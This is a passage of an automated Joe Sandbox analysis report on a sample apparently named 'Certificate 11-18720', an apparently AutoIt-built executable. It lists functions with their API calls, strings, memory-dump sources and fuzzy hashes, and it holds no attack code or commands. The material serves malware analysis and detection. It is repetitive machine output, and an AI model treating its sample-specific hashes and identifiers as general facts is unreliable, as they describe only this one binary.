                                                                                    • Instruction ID: 782c1495e00b85a42eb8fa1bd823bdde93587e06e1cbf08691e1990558147f85
                                                                                    • Opcode Fuzzy Hash: a8bb937602cefd9016c05abe8d370f185f99b1a6090e4d989ca3bedf898cd44c
                                                                                    • Instruction Fuzzy Hash: 0F11A070A01221BBDF258F61D888EFBFAAAFF06755F14822AF50597240DB705981C6E0
                                                                                    Function 005EA70C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 005F37A7
                                                                                    • ___raise_securityfailure.LIBCMT ref: 005F388E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                    • String ID: (h
                                                                                    • API String ID: 3761405300-1071143277
                                                                                    • Opcode ID: d2cc89a0946d00c8943181ce6d67c3b9c5c40ba0f31e71e92d581ac61def206a
                                                                                    • Instruction ID: 0eca18bb4d8c18fb438f9b872bfaad39df335a8485a11e28d3db293b0258835d
                                                                                    • Opcode Fuzzy Hash: d2cc89a0946d00c8943181ce6d67c3b9c5c40ba0f31e71e92d581ac61def206a
                                                                                    • Instruction Fuzzy Hash: AC21E4B5501304EAF794DF55E9896163BB6FF4C310F11AE2AE508863B1E3B46988CB45
                                                                                    Function 0061A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0061A84E
                                                                                    • htons.WSOCK32(00000000,?,00000000), ref: 0061A88B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: htonsinet_addr
                                                                                    • String ID: 255.255.255.255
                                                                                    • API String ID: 3832099526-2422070025
                                                                                    • Opcode ID: e3cf6211ad6a69a7eb532a732b0bf6887cceb385f7fbafb4d7fc7016b285f855
                                                                                    • Instruction ID: c611eb79c6e933ad902dd0e60ba9b843d045783c72878cccfdfe62332d81fa5a
                                                                                    • Opcode Fuzzy Hash: e3cf6211ad6a69a7eb532a732b0bf6887cceb385f7fbafb4d7fc7016b285f855
                                                                                    • Instruction Fuzzy Hash: 04012238200305ABCB209FE8C88AFE9B766FF45320F14842AF5169B3D1CB31E8428756
                                                                                    Function 005FB781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 005FB7EF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 3850602802-1403004172
                                                                                    • Opcode ID: 536e38908e3974c78eceb7cb306486705a014453517360c770cf3c4f37e39576
                                                                                    • Instruction ID: e0b4b1f2f82e44d41b70ca4038863ddbf262e93d99396ea8a84a3fc980673afd
                                                                                    • Opcode Fuzzy Hash: 536e38908e3974c78eceb7cb306486705a014453517360c770cf3c4f37e39576
                                                                                    • Instruction Fuzzy Hash: 1C01DE7160111AAFDB04EBA4CC56EFE3B6ABF86350B04061CF562672C2EF64580887A0
                                                                                    Function 005FB67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 005FB6EB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 3850602802-1403004172
                                                                                    • Opcode ID: a60e01053820e5ccae08a6eaadd189f66ad5a89f2e033993260e0a44411a15d7
                                                                                    • Instruction ID: f8c68acd68357f8b74451ab7c8d4fa8167b43d567d006715c50ac75ada584bf9
                                                                                    • Opcode Fuzzy Hash: a60e01053820e5ccae08a6eaadd189f66ad5a89f2e033993260e0a44411a15d7
                                                                                    • Instruction Fuzzy Hash: AA01DFB164000AAFDB04EBE4C956FFE3BB9AB46344F10001CF606A3282EF585E0887B5
                                                                                    Function 005FB700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 005FB76C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 3850602802-1403004172
                                                                                    • Opcode ID: e3194b4f0e2ceade075cc3fadfa51627c8d1c7a6e679895ff4170cda29b29987
                                                                                    • Instruction ID: b06c98e3804d5cad26b89dd9bca8168515448c33c04c9c06f2126fb965784951
                                                                                    • Opcode Fuzzy Hash: e3194b4f0e2ceade075cc3fadfa51627c8d1c7a6e679895ff4170cda29b29987
                                                                                    • Instruction Fuzzy Hash: 7901F2B564100AEBDB00F7E4C916FFE7BADAB46304F540019B505B3192DB685E0887B1
                                                                                    Function 005E4D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: __calloc_crt
                                                                                    • String ID: "h
                                                                                    • API String ID: 3494438863-15350742
                                                                                    • Opcode ID: d984063aaffbd554b61210b806202e7f4aff09420f431973d99ec13f0e761e1b
                                                                                    • Instruction ID: 2b2acad038a96ef5394b697f26da78b3a0db9169c82f946b21fed98a469df40b
                                                                                    • Opcode Fuzzy Hash: d984063aaffbd554b61210b806202e7f4aff09420f431973d99ec13f0e761e1b
                                                                                    • Instruction Fuzzy Hash: 82F04670208243AAE32C8F1BBD7066A6FD6F780B70F104A1BF201CE285E770C9818F94
                                                                                    Function 005C4024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadImageW.USER32(005C0000,00000063,00000001,00000010,00000010,00000000), ref: 005C4048
                                                                                    • EnumResourceNamesW.KERNEL32(00000000,0000000E,006067E9,00000063,00000000,75C10280,?,?,005C3EE1,?,?,000000FF), ref: 006341B3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnumImageLoadNamesResource
                                                                                    • String ID: >\
                                                                                    • API String ID: 1578290342-3341390398
                                                                                    • Opcode ID: d883150cd8e388a455cc001463369f041e65687a3418e0c44cec5c3bd148e1b1
                                                                                    • Instruction ID: 01b83a24712819ff56a780d13c8be3dc423c46136e48e69e5e9853e8bbf80e12
                                                                                    • Opcode Fuzzy Hash: d883150cd8e388a455cc001463369f041e65687a3418e0c44cec5c3bd148e1b1
                                                                                    • Instruction Fuzzy Hash: 76F06D35680310BBE3204B1AAC4AFD23EAEE706BB5F10160AF324AE1D0D6E090919B94
                                                                                    Function 00607744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassName_wcscmp
                                                                                    • String ID: #32770
                                                                                    • API String ID: 2292705959-463685578
                                                                                    • Opcode ID: c4bac76f50727071b30206058622d2d748ef429ac72bb4ea800edcee70dcbb72
                                                                                    • Instruction ID: 0dffc03661045d220746b317fe212830a49b1073659104ad8940f24b1edd2a10
                                                                                    • Opcode Fuzzy Hash: c4bac76f50727071b30206058622d2d748ef429ac72bb4ea800edcee70dcbb72
                                                                                    • Instruction Fuzzy Hash: 8BE0D877A0433527D720EAA5DC09ECBFFADEB91B60F010116F945D3181D670E60187D4
                                                                                    Function 005FA631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 005FA63F
                                                                                      • Part of subcall function 005E13F1: _doexit.LIBCMT ref: 005E13FB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message_doexit
                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                    • API String ID: 1993061046-4017498283
                                                                                    • Opcode ID: 94fd40dfb65a69e0c6119e05805ac2ff35fc71be64349e5b6334b461ed29df54
                                                                                    • Instruction ID: e9867f147ec5310af0ada49b85184f73041d972e0f5c5dba9cc96be431c74307
                                                                                    • Opcode Fuzzy Hash: 94fd40dfb65a69e0c6119e05805ac2ff35fc71be64349e5b6334b461ed29df54
                                                                                    • Instruction Fuzzy Hash: 32D02B313C032933C3243AE97C1FFC47D4DAB49B51F050416BB0C956C349E2958002DD
                                                                                    Function 0063AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 0063ACC0
                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0063AEBD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryFreeLibrarySystem
                                                                                    • String ID: WIN_XPe
                                                                                    • API String ID: 510247158-3257408948
                                                                                    • Opcode ID: c7f90157197f1d318d43ca59a19057732759d144572cb1177ff4e8cbd7f327f5
                                                                                    • Instruction ID: 4ab9d375f6513642ce0e5bdc9af249434f36ce3e46dbedc2274ce498af6f810e
                                                                                    • Opcode Fuzzy Hash: c7f90157197f1d318d43ca59a19057732759d144572cb1177ff4e8cbd7f327f5
                                                                                    • Instruction Fuzzy Hash: BFE06D70C00109EFCB11DBE8D9849ECB7BAAB48300F14A086E582B2260CB704A85EF22
                                                                                    Function 006286CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006286E2
                                                                                    • PostMessageW.USER32(00000000), ref: 006286E9
                                                                                      • Part of subcall function 00607A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00607AD0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 529655941-2988720461
                                                                                    • Opcode ID: 1af248051e2db4639ad4bd344bd6557845ad185fcbfc685a105613c24029765b
                                                                                    • Instruction ID: 0f15c13aa5e8de1c6c2fee9e039a30a06ed81e1c776fc45c93380e69e331a64d
                                                                                    • Opcode Fuzzy Hash: 1af248051e2db4639ad4bd344bd6557845ad185fcbfc685a105613c24029765b
                                                                                    • Instruction Fuzzy Hash: C4D0C935BC53247BF3686770AC0BFC66A1A9B05B11F111819B649AA1D0C9A4A9408658
                                                                                    Function 00628698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006286A2
                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 006286B5
                                                                                      • Part of subcall function 00607A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00607AD0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 529655941-2988720461
                                                                                    • Opcode ID: d846d55718b5ee35399d22c12e77cc16806333196518cf3c9a76876309e14005
                                                                                    • Instruction ID: 2d52b68c4aa32d3bb8f4e8acdc43ab05814490c23370bd2b74ada212236bd405
                                                                                    • Opcode Fuzzy Hash: d846d55718b5ee35399d22c12e77cc16806333196518cf3c9a76876309e14005
                                                                                    • Instruction Fuzzy Hash: 82D0C935B84324B7F3686770AC0BFC66A1A9B05B11F111819B649AA1D0C9A4A9408654